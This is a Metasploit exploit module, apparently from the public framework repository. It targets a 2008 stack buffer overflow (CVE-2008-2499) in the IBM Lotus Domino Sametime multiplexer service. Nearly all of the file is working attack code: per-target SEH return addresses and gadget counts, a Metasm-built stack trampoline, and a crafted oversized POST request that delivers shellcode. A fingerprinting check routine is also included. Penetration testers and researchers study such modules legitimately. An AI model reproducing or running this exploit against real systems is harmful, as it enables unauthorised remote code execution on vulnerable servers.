Path: blob/master/modules/exploits/windows/lotus/domino_sametime_stmux.rb
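##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# SEH overwrite in the Sametime Multiplexer (STMux.exe) via an overly long
# POST URI. The overflow is in the request path; the HTTP body carries the
# payload, which the trampoline built in #exploit lands on.
class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'IBM Lotus Domino Sametime STMux.exe Stack Buffer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in Lotus Domino\'s Sametime
          Server. By sending an overly long POST request to the Multiplexer
          STMux.exe service we are able to overwrite SEH. Based on the exploit
          by Manuel Santamarina Suarez.
        },
        'Author' => [ 'aushack', 'riaf <riaf[at]mysec.org>' ],
        'Arch' => [ ARCH_X86 ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2008-2499' ],
          [ 'OSVDB', '45610' ],
          [ 'BID', '29328' ],
          [ 'ZDI', '08-028' ],
          [ 'ATT&CK', Mitre::Attack::Technique::T1210_EXPLOITATION_OF_REMOTE_SERVICES]
        ],
        'Privileged' => true,
        'DefaultOptions' => {
          'EXITFUNC' => 'seh',
        },
        'Payload' => {
          'Space' => 1024,
          # The payload travels in the HTTP body, so only NUL/CR/LF are unsafe.
          'BadChars' => "\x00\x0a\x0d",
          'StackAdjustment' => -3500,
        },
        'Platform' => ['win'],
        # 'Ret' is a pop ecx / pop ecx / ret gadget in msvcr71.dll (same address
        # for every target). 'Offset' is [pop ebx count, popad count] used by
        # the stack-walk trampoline in #exploit; it differs per OS/SP.
        'Targets' => [
          # Patrick - Tested OK against Windows 2003 SP1 20081114
          [ 'Lotus Sametime 7.5 on Windows Server 2000 SP4', { 'Ret' => 0x7c3410c2, 'Offset' => [ 3, 268 ] }], # pop ecx, pop ecx, ret msvcr71.dll
          [ 'Lotus Sametime 7.5 on Windows Server 2003 SP1', { 'Ret' => 0x7c3410c2, 'Offset' => [ 3, 269 ] }], # pop ecx, pop ecx, ret msvcr71.dll
          [ 'Lotus Sametime 7.5 on Windows Server 2003 SP2', { 'Ret' => 0x7c3410c2, 'Offset' => [ 4, 269 ] }],
          [ 'Lotus Sametime 7.5.1 Windows Server 2003 SP2', { 'Ret' => 0x7c3410c2, 'Offset' => [ 5, 269 ] }],
          [ 'Lotus Sametime 8.0.0 Windows Server 2003 SP2', { 'Ret' => 0x7c3410c2, 'Offset' => [ 4, 269 ] }],
        ],
        'DisclosureDate' => '2008-05-21',
        'DefaultTarget' => 1,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(1533),
      ]
    )
  end

  # Fingerprint only, not a vulnerability test: looks for a "Lotus-Domino"
  # banner on HEAD / and a 200 for /CommunityCBR (the path the overflow is sent
  # to). No version is inspected, so Detected does not mean Vulnerable, and a
  # host with a customised banner yields Safe as a false negative.
  #
  # @return [Exploit::CheckCode] Detected or Safe
  def check
    banner = sametime_request('HEAD', '/')
    return Exploit::CheckCode::Safe unless banner.match?(/Lotus-Domino/)

    cbr = sametime_request('GET', '/CommunityCBR')
    return Exploit::CheckCode::Safe unless cbr.match?(/200 OK/)

    Exploit::CheckCode::Detected
  end

  # Sends the crafted POST: the SEH trampoline lives in the URI, the payload in
  # the body. Unchanged wire format from the original module; only the
  # Content-Length computation now uses the byte length of the payload.
  def exploit
    connect

    pad1 = rand_text_alpha_lower(44)
    pad2 = rand_text_alpha_lower(29)

    # Gadgets are assembled with Metasm rather than hand-encoded. The
    # trampoline walks ESP up to the payload: N x "pop ebx" then M x "popad"
    # (counts are per target), finishing with an indirect jump through ESP.
    popebx = Metasm::Shellcode.assemble(Metasm::Ia32.new, "pop ebx").encode_string * target['Offset'][0]
    popad = Metasm::Shellcode.assemble(Metasm::Ia32.new, "popad").encode_string * target['Offset'][1]
    jmp_esp = "\xff\x24\x24" # jmp dword ptr ss:[esp]
    # je +0x23 followed by jnz +0x21: both branches land on the same byte, so
    # this is an unconditional hop over the SEH record and pad2 onto popebx.
    short_jmp = "\x74\x23" + "\x75\x21"
    seh = [target['Ret']].pack('V') # pop/pop/ret in msvcr71.dll

    path = pad1 + short_jmp + seh + pad2 + popebx + popad + jmp_esp
    body = payload.encoded

    req = "POST /CommunityCBR/CC.39.#{path}/\r\n"
    req << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"
    req << "User-Agent: Sametime Community Agent\r\n"
    # bytesize, not length: the body is raw shellcode, and a character count on
    # a non-binary-encoded string would understate it and truncate the payload.
    req << "Content-Length: #{body.bytesize}\r\n"
    req << "Connection: Close\r\n"
    req << "Cache-Control: no-cache\r\n\r\n"
    req << body

    sock.put(req)

    handler
    disconnect
  end

  private

  # One request/response exchange on a fresh connection, using the headers the
  # Sametime client sends. The socket is closed in all cases, including when
  # put/get raises, which the original inline version did not guarantee.
  #
  # @param verb [String] HTTP method, e.g. 'HEAD'
  # @param path [String] request path, e.g. '/CommunityCBR'
  # @return [String] raw response bytes, or '' when the server sent nothing
  def sametime_request(verb, path)
    connect

    req = "#{verb} #{path} HTTP/1.1\r\n"
    req << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"
    req << "User-Agent: Sametime Community Agent\r\n\r\n"

    sock.put(req)
    (sock.get_once || '').to_s
  ensure
    disconnect
  end
end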